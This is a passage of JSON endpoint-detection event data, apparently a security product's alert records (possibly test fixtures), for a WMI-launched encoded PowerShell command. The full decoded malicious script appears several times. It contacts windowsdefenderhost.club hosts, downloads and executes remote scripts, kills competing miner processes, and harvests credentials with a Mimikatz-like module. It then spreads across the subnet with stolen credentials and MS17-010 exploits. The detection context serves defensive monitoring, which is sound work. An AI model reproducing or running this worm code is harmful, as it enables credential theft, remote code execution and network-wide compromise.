 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) ","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","$ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
 $ N e t w o r k s   =   G e t - W m i O b j e c t   W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n   - E A   S t o p   |   ?   { $ _ . I P E n a b l e d }          
 $ i p s u   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i p s u ' ] . V a l u e    
 $ i 1 7   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' i 1 7 ' ] . V a l u e  
 $ s c b a =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' s c ' ] . V a l u e  
 [ b y t e [ ] ] $ s c = [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ s c b a )            
 f o r e a c h   ( $ N e t w o r k   i n   $ N e t w o r k s )    
 {                          
          
         $ I P A d d r e s s     =   $ N e t w o r k . I p A d d r e s s [ 0 ]      
 	 i f   ( $ I P A d d r e s s   - m a t c h   ' ^ 1 6 9 . 2 5 4 ' ) { c o n t i n u e }   	  
         $ S u b n e t M a s k     =   $ N e t w o r k . I P S u b n e t [ 0 ]      
         $ i p s = G e t - N e t w o r k R a n g e   $ I P A d d r e s s   $ S u b n e t M a s k  
 	 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 	 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
 	 	 i f   ( $ l i n e . c o u n t   - l e   4 ) { c o n t i n u e }  
 	 	 $ i = $ l i n e [ - 3 ] . s p l i t ( ' : ' ) [ 0 ]  
                 i f   (   ( $ l i n e [ - 2 ]   - e q   ' E S T A B L I S H E D ' )   - a n d     ( $ i   - n e   ' 1 2 7 . 0 . 0 . 1 ' )   - a n d   ( $ i p s   - n o t c o n t a i n s   $ i ) )  
                 {  
                         $ i p s + = $ i  
                 }  
         }  
         i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
         f o r e a c h   ( $ i p   i n   $ i p s )  
         {        
                 i f   ( ( [ E n v i r o n m e n t ] : : T i c k C o u n t - $ s t i m e ) / 1 0 0 0   - g t   5 4 0 0 ) { b r e a k }  
                 i f   ( $ i p   - e q   $ I P A d d r e s s ) { c o n t i n u e }            
                 i f   ( ( T e s t - C o n n e c t i o n   $ i p   - c o u n t   1 )   - n e   $ n u l l     - a n d   $ i p s u   - n o t c o n t a i n s   $ i p )    
                 {        
                         $ r e = 0  
                         i f   ( $ a . c o u n t   - n e   0 )              
                         { $ r e   =   t e s t - i p   - i p   $ i p   - c r e d s   $ a     - n i c   $ n i c   - n t l m   $ N T L M   }  
                         i f   ( $ r e   - e q   1 ) { $ i p s u   = $ i p s u   + "   " + $ i p }  
 	 	 	 e l s e  
 	 	 	 {  
 	 	 	 	 $ v u l = [ P i n g C a s t l e . S c a n n e r s . m 1 7 s c ] : : S c a n ( $ i p ) 	 	 	 	  
 	 	 	 	 i f   ( $ v u l   - a n d   $ i 1 7   - n o t c o n t a i n s   $ i p )  
  
 	 	 	 	 {  
 	 	 	 	 	 $ r e s = e b 7   $ i p   $ s c  
 	 	 	 	 	 i f   ( ! ( $ r e s   - e q   $ t r u e ) )  
 	 	 	 	 	 { e b 8   $ i p   $ s c }  
 	 	 	 	 	 $ i 1 7   =   $ i 1 7   +   "   " + $ i p  
 	 	 	 	 }  
 	 	 	 }  
                 }  
         }  
   }                
 $ S t a t i c C l a s s = N e w - O b j e c t   M a n a g e m e n t . M a n a g e m e n t C l a s s ( ' r o o t \ d e f a u l t : c o r e d p u s s v r ' )      
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i p s u '   , $ i p s u )  
 $ S t a t i c C l a s s . P u t ( )  
 $ S t a t i c C l a s s . S e t P r o p e r t y V a l u e ( ' i 1 7 '   , $ i 1 7 )  
 $ S t a t i c C l a s s . P u t ( ) "],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E $ s e = @ ( ' u p d a t e . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' i n f o . w i n d o w s d e f e n d e r h o s t . c l u b ' , ' 8 7 . 1 2 1 . 9 8 . 2 1 5 ' )  
 $ n i c = ' w w w . w i n d o w s d e f e n d e r h o s t . c l u b '  
 f o r e a c h ( $ t   i n   $ s e )  
 {  
         $ p i n = t e s t - c o n n e c t i o n   $ t  
         i f   ( $ p i n   - n e   $ n u l l )  
         {  
                 $ n i c = $ t  
                 b r e a k  
         }  
 }  
 $ n i c = $ n i c + " : 8 0 0 0 "  
 $ v e r = ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / v e r . t x t " ) . T r i m ( )    
 i f ( $ v e r   - n e   $ n u l l ) {    
         i f ( $ v e r   - n e   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' v e r ' ] . V a l u e ) {    
                 I E X   ( N e w - O b j e c t   N e t . W e b C l i e n t ) . D o w n l o a d S t r i n g ( " h t t p : / / $ n i c / i n f o 6 . p s 1 " )  
                 r e t u r n    
         }    
 }  
 $ s t i m e = [ E n v i r o n m e n t ] : : T i c k C o u n t  
 $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e                  
 $ d e f u n = [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ f u n s ) )  
 i e x   $ d e f u n  
  
 G e t - W m i O b j e c t   _ _ F i l t e r T o C o n s u m e r B i n d i n g   - N a m e s p a c e   r o o t \ s u b s c r i p t i o n   |   W h e r e - O b j e c t   { $ _ . f i l t e r   - n o t m a t c h   ' S y s t e m   E v e n t s   L o g ' }   | R e m o v e - W m i O b j e c t  
 $ d i r p a t h = $ e n v : S y s t e m R o o t + ' \ s y s t e m 3 2 '        
 i f     ( ! ( t e s t - p a t h   $ d i r p a t h   ) ) {  
 	 $ d i r p a t h = $ e n v : S y s t e m R o o t  
 }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' ) ) )  
  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c p 1 2 0 . d l l ' )   ' v c p ' }  
 i f   ( ! ( t e s t - p a t h   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' ) ) )  
 { s e n t f i l e   ( $ d i r p a t h + ' \ m s v c r 1 2 0 . d l l ' )   ' v c r ' }  
  
 [ a r r a y ] $ p s i d s =   g e t - p r o c e s s   - n a m e   p o w e r s h e l l   | s o r t   c p u   - D e s c e n d i n g |   F o r E a c h - O b j e c t   { $ _ . i d }  
 $ t c p c o n n   =   n e t s t a t   - a n o p   t c p    
 $ e x i s t = $ F a l s e  
 i f   ( $ p s i d s   - n e   $ n u l l   )  
 {  
         f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( $ l i n e   - e q   $ n u l l )  
                 { c o n t i n u e }  
                 i f   ( ( $ p s i d s [ 0 ]   - e q   $ l i n e [ - 1 ] )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ t . c o n t a i n s ( " : 8 0   " )   - o r   $ t . c o n t a i n s ( " : 1 4 4 4 4 " ) )   )  
                 {  
                         $ e x i s t = $ t r u e  
                         b r e a k  
                 }  
         }  
 }  
 K i l l B o t ( ' c o r e d p u s s v r ' )  
 f o r e a c h   ( $ t   i n   $ t c p c o n n )  
         {  
                 $ l i n e   = $ t . s p l i t ( '   ' ) |   ? { $ _ }  
                 i f   ( ! ( $ l i n e   - i s   [ a r r a y ] ) ) { c o n t i n u e }  
                 i f   ( ( $ l i n e [ - 3 ]   - n e   $ n u l l )   - a n d   $ t . c o n t a i n s ( " E S T A B L I S H E D " )   - a n d   ( $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 1 1 1 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 2 2 2 2 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 3 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 4 4 4 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 5 5 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 6 6 6 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 7 7 7 7 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 8 8 8 8 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 9 9 9 9 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 1 4 4 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 4 5 5 6 0 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 6 5 3 3 3 " )   - o r   $ l i n e [ - 3 ] . c o n t a i n s ( " : 5 5 3 3 5 " ) ) )  
                 {  
                         $ e v i d = $ l i n e [ - 1 ]  
                         G e t - P r o c e s s   - i d   $ e v i d   |   s t o p - p r o c e s s   - f o r c e  
                 }  
         }  
 i f   ( ! $ e x i s t   - a n d   ( $ p s i d s . c o u n t   - l e   8 ) )  
 {        
         $ c m d m o n = " p o w e r s h e l l   - N o P   - N o n I   - W   H i d d e n   ` " ` $ m o n   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m o n ' ] . V a l u e ; ` $ f u n s   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' f u n s ' ] . V a l u e   ; i e x   ( [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( [ S y s t e m . C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( ` $ f u n s ) ) ) ; I n v o k e - C o m m a n d     - S c r i p t B l o c k   ` $ R e m o t e S c r i p t B l o c k   - A r g u m e n t L i s t   @ ( ` $ m o n ,   ` $ m o n ,   ' V o i d ' ,   0 ,   ' ' ,   ' ' ) ` " "  
         $ v b s   =   N e w - O b j e c t   - C o m O b j e c t   W S c r i p t . S h e l l  
 	 $ v b s . r u n ( $ c m d m o n , 0 )      
 }  
  
 $ N T L M = $ F a l s e  
 $ m i m i   =   ( [ W m i C l a s s ]   ' r o o t \ d e f a u l t : c o r e d p u s s v r ' ) . P r o p e r t i e s [ ' m i m i ' ] . V a l u e    
 $ a ,   $ N T L M =   G e t - c r e d s   $ m i m i   $ m i m i  
                
